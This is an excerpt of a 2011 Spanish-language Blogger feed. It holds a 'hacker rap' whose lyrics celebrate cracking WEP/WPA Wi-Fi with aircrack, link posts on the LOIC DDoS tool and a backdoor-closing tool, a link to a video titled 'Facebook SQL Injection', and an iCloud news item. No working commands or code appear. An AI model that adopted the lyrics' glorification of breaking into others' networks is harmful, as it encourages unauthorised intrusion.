/><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/browser-autopwn.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEFQ3c4eip7ImA9WhRTEEo.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2727801208127778497</id><published>2011-10-31T09:04:00.002-06:00</published><updated>2011-10-31T09:06:52.932-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-31T09:06:52.932-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="wpa" /><category scheme="http://www.blogger.com/atom/ns#" term="aircrack" /><category scheme="http://www.blogger.com/atom/ns#" term="hacker" /><category scheme="http://www.blogger.com/atom/ns#" term="tron" /><category scheme="http://www.blogger.com/atom/ns#" term="smdani" /><category scheme="http://www.blogger.com/atom/ns#" term="wifi" /><category scheme="http://www.blogger.com/atom/ns#" term="wep" /><category scheme="http://www.blogger.com/atom/ns#" term="rap" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="backtrack" /><title>Hacker Rap Subtitulado - smdani (Tron edition)</title><content type="html">&lt;iframe  width="425" height="349" src="http://www.youtube.com/embed/Qkwdm5SWLGM" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;http://youtu.be/Qkwdm5SWLGM&lt;br /&gt;Descarga el tema original en: http://bit.ly/h0LJlJ&lt;br /&gt;&lt;br /&gt;Toda tu mente siente la atracción&lt;br /&gt;de la inquietud, romper barreras, la superación&lt;br /&gt;bajo las yemas de tus dedos un teclado&lt;br /&gt;pupilas dilatadas y el corazón acelerado.&lt;br /&gt;&lt;br /&gt;Suplanto MAC identidad, y expulso a los clientes,&lt;br /&gt;capturo en modo monitor, e inyecto más paquetes,&lt;br /&gt;rubik resuelvo sentado en el sillón&lt;br /&gt;aircrack se ejecuta reventando encriptación.&lt;br /&gt;&lt;br /&gt;Desde niño entre chips y cables,&lt;br /&gt;comprender e inconformismo siempre fueron las constantes,&lt;br /&gt;deseando subyugar a la tecnología,&lt;br /&gt;bajo el mando de mi voluntad, me divertía.&lt;br /&gt;&lt;br /&gt;Procesadores y teclados revolucionaron&lt;br /&gt;mi imaginación se desbordaba programando.&lt;br /&gt;Soluciono los problemas imposibles sin dilemas,&lt;br /&gt;imparable acometida de mi mente a tus sistemas.&lt;br /&gt;&lt;br /&gt;No sólo existe lo que ves, no seas zafio&lt;br /&gt;en franjas inaudibles viajan ondas, portan datos,&lt;br /&gt;la materia más preciada, información, &lt;br /&gt;viaja por el aire y es posible realizar intercepción&lt;br /&gt;&lt;br /&gt;Nuevo terreno, de escanear es tiempo&lt;br /&gt;backtrack se ejecuta interpretando lo que lleva el viento&lt;br /&gt;la zona está petada de WEP y WPA, &lt;br /&gt;en mis labios la sonrisa, tiempo es de trabajar.&lt;br /&gt;&lt;br /&gt;Suplanto MAC identidad, y expulso a los clientes,&lt;br /&gt;capturo en modo monitor, e inyecto más paquetes,&lt;br /&gt;rubik resuelvo sentado en el sillón&lt;br /&gt;aircrack se ejecuta reventando encriptación.&lt;br /&gt;&lt;br /&gt;Suplanto MAC identidad, y expulso a los clientes,&lt;br /&gt;capturo en modo monitor, e inyecto más paquetes,&lt;br /&gt;rubik resuelvo sentado en el sillón&lt;br /&gt;aircrack se ejecuta reventando encriptación.&lt;br /&gt;&lt;br /&gt;Autor: smdani&lt;br /&gt;Año: 2009&lt;br /&gt;Género: rap&lt;br /&gt;Base: Kiwi kon almendras y salsa rosa - Jonan&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2727801208127778497?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/hMH9MMkO3F0TsKwjwcchkF4lsFU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hMH9MMkO3F0TsKwjwcchkF4lsFU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/hMH9MMkO3F0TsKwjwcchkF4lsFU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hMH9MMkO3F0TsKwjwcchkF4lsFU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/WYhAKySA0Ow" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2727801208127778497/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2727801208127778497" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2727801208127778497?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2727801208127778497?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/WYhAKySA0Ow/hacker-rap-subtitulado-smdani-tron.html" title="Hacker Rap Subtitulado - smdani (Tron edition)" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/Qkwdm5SWLGM/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/10/hacker-rap-subtitulado-smdani-tron.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0UGSXs5eSp7ImA9WhdUEkg.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-3355451529269542916</id><published>2011-09-28T20:20:00.000-05:00</published><updated>2011-09-28T20:20:28.521-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-28T20:20:28.521-05:00</app:edited><title>LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers</title><content type="html">&lt;a href="http://hackplayers.blogspot.com/2010/12/loic-la-herramienta-ddos-utilizada-por.html"&gt;LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers&lt;/a&gt;: "LOIC (Low Orbit Ion Cannon o Cañón de Iones de Órbita Baja) es una aplicación de pruebas de estrés en red de código abierto, escrita en C# y desarrollada por Praetox Technologies.&lt;br /&gt;"&lt;br&gt;&lt;br&gt;&lt;a style="font-size:13px" href="https://chrome.google.com/webstore/detail/pengoopmcjnbflcjbmoeodbmoflcgjlk"&gt;'via Blog this'&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3355451529269542916?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/FRySGLf8rnTYDQrurxhozZ2P0aI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FRySGLf8rnTYDQrurxhozZ2P0aI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/FRySGLf8rnTYDQrurxhozZ2P0aI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FRySGLf8rnTYDQrurxhozZ2P0aI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/IW9IAilHrqw" height="1" width="1"/&gt;</content><link rel="related" href="http://hackplayers.blogspot.com/2010/12/loic-la-herramienta-ddos-utilizada-por.html" title="LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/3355451529269542916/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=3355451529269542916" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3355451529269542916?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3355451529269542916?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/IW9IAilHrqw/loic-la-herramienta-ddos-utilizada-por.html" title="LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/09/loic-la-herramienta-ddos-utilizada-por.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cGQXw5eSp7ImA9WhdUEkg.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2927821967609150878</id><published>2011-09-28T20:17:00.000-05:00</published><updated>2011-09-28T20:17:00.221-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-28T20:17:00.221-05:00</app:edited><title>Cierra las puertas traseras con CloseTheDoor : hackplayers</title><content type="html">&lt;a href="http://hackplayers.blogspot.com/2011/09/cierra-las-puertas-traseras-con.html#more"&gt;Cierra las puertas traseras con CloseTheDoor : hackplayers&lt;/a&gt;: "Como todos sabéis, los backdoors o puertas traseras remotas son utilizados frecuentemente para mantener el acceso a los sistemas comprometidos. Generalmente se dividen tres en categorías: Network Socket Listeners, troyanos o Covert Channels."&lt;br&gt;&lt;br&gt;&lt;a style="font-size:13px" href="https://chrome.google.com/webstore/detail/pengoopmcjnbflcjbmoeodbmoflcgjlk"&gt;'via Blog this'&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2927821967609150878?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/6yJs09VmbRG2djie5FVix-FiS58/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6yJs09VmbRG2djie5FVix-FiS58/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/6yJs09VmbRG2djie5FVix-FiS58/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6yJs09VmbRG2djie5FVix-FiS58/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/GCZUw4rJJgI" height="1" width="1"/&gt;</content><link rel="related" href="http://hackplayers.blogspot.com/2011/09/cierra-las-puertas-traseras-con.html#more" title="Cierra las puertas traseras con CloseTheDoor : hackplayers" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2927821967609150878/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2927821967609150878" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2927821967609150878?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2927821967609150878?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/GCZUw4rJJgI/cierra-las-puertas-traseras-con.html" title="Cierra las puertas traseras con CloseTheDoor : hackplayers" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/09/cierra-las-puertas-traseras-con.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEENR344eCp7ImA9WhdWEEo.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-5668546821641936102</id><published>2011-09-03T12:58:00.000-05:00</published><updated>2011-09-03T12:58:16.030-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-03T12:58:16.030-05:00</app:edited><title>www.Facebook.com SQL Injection | @TurkAslanlari - YouTube</title><content type="html">&lt;a href="http://www.youtube.com/watch?v=yUqCFYi_O4Y&amp;amp;feature=player_embedded"&gt;www.Facebook.com SQL Injection | @TurkAslanlari - YouTube&lt;/a&gt;: www.Facebook.com SQL Injection | @TurkAslanlari&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5668546821641936102?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/y_4TStuCqGrHWlOGvEQKabVxTHE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/y_4TStuCqGrHWlOGvEQKabVxTHE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/y_4TStuCqGrHWlOGvEQKabVxTHE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/y_4TStuCqGrHWlOGvEQKabVxTHE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/FbeLuUdoZdI" height="1" width="1"/&gt;</content><link rel="related" href="http://www.youtube.com/watch?v=yUqCFYi_O4Y&amp;feature=player_embedded" title="www.Facebook.com SQL Injection | @TurkAslanlari - YouTube" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/5668546821641936102/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=5668546821641936102" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5668546821641936102?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5668546821641936102?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/FbeLuUdoZdI/wwwfacebookcom-sql-injection.html" title="www.Facebook.com SQL Injection | @TurkAslanlari - YouTube" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/09/wwwfacebookcom-sql-injection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D08ERX48eSp7ImA9WhdXGUo.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-393379912801098443</id><published>2011-09-02T10:03:00.001-05:00</published><updated>2011-09-02T10:03:24.071-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-02T10:03:24.071-05:00</app:edited><title>Apple instala su iCloud en la nube de Microsoft</title><content type="html">&lt;a href="http://diarioti.com/gate/n.php?id=30243"&gt;DiarioTi: Diario Tecnologías de la Información&lt;/a&gt;: La publicación británica The Register informa que Apple ha seleccionado Microsoft Azure y AWS de Amazon para implementar su servicio iCloud.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-393379912801098443?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4Vsvtu_cOhfycZhByJnJQPNMLIE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Vsvtu_cOhfycZhByJnJQPNMLIE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4Vsvtu_cOhfycZhByJnJQPNMLIE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Vsvtu_cOhfycZhByJnJQPNMLIE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/QUyInWJ07iw" height="1" width="1"/&gt;</content><link rel="related" href="http://diarioti.com/gate/n.php?id=30243" title="Apple instala su iCloud en la nube de Microsoft" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/393379912801098443/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=393379912801098443" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/393379912801098443?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/393379912801098443?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/QUyInWJ07iw/apple-instala-su-icloud-en-la-nube-de_02.html" title="Apple instala su iCloud en la nube de Microsoft" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/09/apple-instala-su-icloud-en-la-nube-de_02.html</feedburner:origLink></entry></feed>

